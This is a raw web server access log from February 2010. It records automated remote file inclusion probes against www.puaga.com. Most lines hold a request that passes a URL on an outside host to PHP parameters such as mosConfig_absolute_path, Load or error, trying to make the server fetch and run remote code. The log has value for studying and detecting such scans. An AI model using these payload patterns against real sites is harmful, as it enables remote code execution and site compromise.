77.79.246.80 - - [13/Feb/2010:09:05:36 -0800] "GET /logs/index.php?Load=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:05:36 -0800] "GET /logs/access_100104.log/index.php?Load=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:05:37 -0800] "GET /index.php?Load=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:05:43 -0800] "GET /logs/access_100122.log//include/lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:05:47 -0800] "GET /logs/access_100122.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:05:50 -0800] "GET /logs/access_100122.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:05:51 -0800] "GET /logs/access_100122.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:05:53 -0800] "GET /logs/access_100122.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:05:54 -0800] "GET /logs/access_100122.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:05:57 -0800] "GET /logs/access_100122.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:06:13 -0800] "GET /logs/access_100123.log//include/lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [13/Feb/2010:09:06:27 -0800] "GET /logs/access_100203.log%20%20//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.transchool.com/n/data/session/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [13/Feb/2010:09:06:39 -0800] "GET /logs/access_100111.log%20%20//index.php?DOCUMENT_ROOT=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [13/Feb/2010:09:06:39 -0800] "GET /logs/access_100119.log%20%20//index.php?DOCUMENT_ROOT=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:06:55 -0800] "GET /logs/access_100104.log%20%20/index.php?Load=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:06:55 -0800] "GET /logs/index.php?Load=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:06:56 -0800] "GET /index.php?Load=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:06:57 -0800] "GET /logs/access_100208.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:06:59 -0800] "GET /logs/access_100104.log%20%20/index.php?Load=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:06:59 -0800] "GET /logs/index.php?Load=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:06:59 -0800] "GET /index.php?Load=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:07:11 -0800] "GET /logs/access_100202.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [13/Feb/2010:09:07:29 -0800] "GET /logs/access_100111.log%20%20//index.php?DOCUMENT_ROOT=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [13/Feb/2010:09:07:29 -0800] "GET /logs/access_100119.log%20%20//index.php?DOCUMENT_ROOT=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.108.61.176 - - [13/Feb/2010:09:07:34 -0800] "GET ///?page=http://www.musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:09:07:48 -0800] "GET /logs/index.php?Load=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:09:07:48 -0800] "GET /logs/access_100104.log%20%20/index.php?Load=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:09:07:48 -0800] "GET /index.php?Load=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:09:08:10 -0800] "GET /logs/access_100208.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:09:08:46 -0800] "GET /logs/access_100104.log%20%20/index.php?Load=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:09:08:46 -0800] "GET /logs/index.php?Load=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:09:08:46 -0800] "GET /index.php?Load=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:09:30 -0800] "GET /logs/access_100127.log//errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:09:30 -0800] "GET /errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:09:30 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:09:10:02 -0800] "GET /logs/access_100202.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:09:10:02 -0800] "GET /logs/access_100129.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:10:03 -0800] "GET /logs/access_100129.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:10:03 -0800] "GET /logs/access_100122.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:10:03 -0800] "GET /logs/access_100119.log//errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:10:08 -0800] "GET /logs/access_100127.log%20%20//errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:10:08 -0800] "GET /errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:10:08 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:09:10:09 -0800] "GET /logs/access_100208.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:10:10 -0800] "GET /logs/access_100127.log%20%20//errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:10:10 -0800] "GET /errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:10:10 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:10:10 -0800] "GET /logs/access_100208.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:09:10:11 -0800] "GET /logs/access_100127.log%20%20//errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:09:10:11 -0800] "GET /errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:09:10:11 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:09:10:13 -0800] "GET /logs/access_100208.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:09:10:19 -0800] "GET /logs/access_100202.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:09:10:19 -0800] "GET /errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:09:10:19 -0800] "GET /logs/access_100127.log%20%20//errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:09:10:20 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:10:21 -0800] "GET /logs/access_100202.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:10:21 -0800] "GET /logs/access_100129.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:09:10:23 -0800] "GET /logs/access_100202.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [13/Feb/2010:09:10:23 -0800] "GET /logs/access.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [13/Feb/2010:09:10:23 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [13/Feb/2010:09:10:23 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:09:10:23 -0800] "GET /logs/access_100129.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:09:10:24 -0800] "GET /logs/access_100129.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:09:10:27 -0800] "GET /logs/access_100119.log%20%20//errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:10:31 -0800] "GET /logs/access_100208.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:10:33 -0800] "GET /logs/access_100208.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:10:34 -0800] "GET /logs/access_100208.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:10:34 -0800] "GET /logs/access_100208.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:10:36 -0800] "GET /logs/access_100208.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:10:37 -0800] "GET /logs/access_100208.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:10:40 -0800] "GET /logs/access_100119.log%20%20//errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:10:40 -0800] "GET /logs/access_100208.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:10:40 -0800] "GET /logs/access_100127.log//errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:10:40 -0800] "GET /errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:10:40 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [13/Feb/2010:09:10:41 -0800] "GET /logs/access_100208.log//faqsupport/samplefaqsupport.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:10:42 -0800] "GET /logs/access_100202.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:10:42 -0800] "GET /logs/access_100202.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:10:42 -0800] "GET /logs/access_100129.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:09:10:42 -0800] "GET /logs/access_100119.log%20%20//errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:10:43 -0800] "GET /logs/access_100202.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:10:43 -0800] "GET /logs/access_100129.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:10:43 -0800] "GET /logs/access_100129.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:10:43 -0800] "GET /logs/access_100202.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:10:43 -0800] "GET /logs/access_100119.log%20%20//errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:10:44 -0800] "GET /logs/access_100129.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:10:44 -0800] "GET /logs/access_100202.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:10:44 -0800] "GET /logs/access_100129.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:10:46 -0800] "GET /logs/access_100202.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [13/Feb/2010:09:10:49 -0800] "GET /logs/access_100116.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:10:50 -0800] "GET /logs/access_100202.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:10:51 -0800] "GET /logs/access_100129.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:09:10:52 -0800] "GET /logs/access_100123.log//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:09:10:52 -0800] "GET /logs/access_100118.log//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:11:01 -0800] "GET /logs/access_100109.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:11:06 -0800] "GET /logs/access_100208.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:11:09 -0800] "GET /logs/access_100119.log//errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [13/Feb/2010:09:11:10 -0800] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [13/Feb/2010:09:11:10 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [13/Feb/2010:09:11:10 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:09:11:18 -0800] "GET /logs/access_100202.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:09:11:42 -0800] "GET /logs/access_100104.log%20%20/index.php?Load=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:09:11:42 -0800] "GET /logs/index.php?Load=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:09:11:42 -0800] "GET /index.php?Load=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [13/Feb/2010:09:12:57 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.aslcaserta2.it//idste.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:09:13:02 -0800] "GET /errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:09:13:02 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:09:13:02 -0800] "GET /logs/access_100118.log%20%20//errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:09:13:13 -0800] "GET /logs/access_100119.log%20%20//errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.108.61.176 - - [13/Feb/2010:09:13:45 -0800] "GET /logs/access_100128.log%20%20////?page=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:09:13:48 -0800] "GET /logs/access_100118.log%20%20//errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
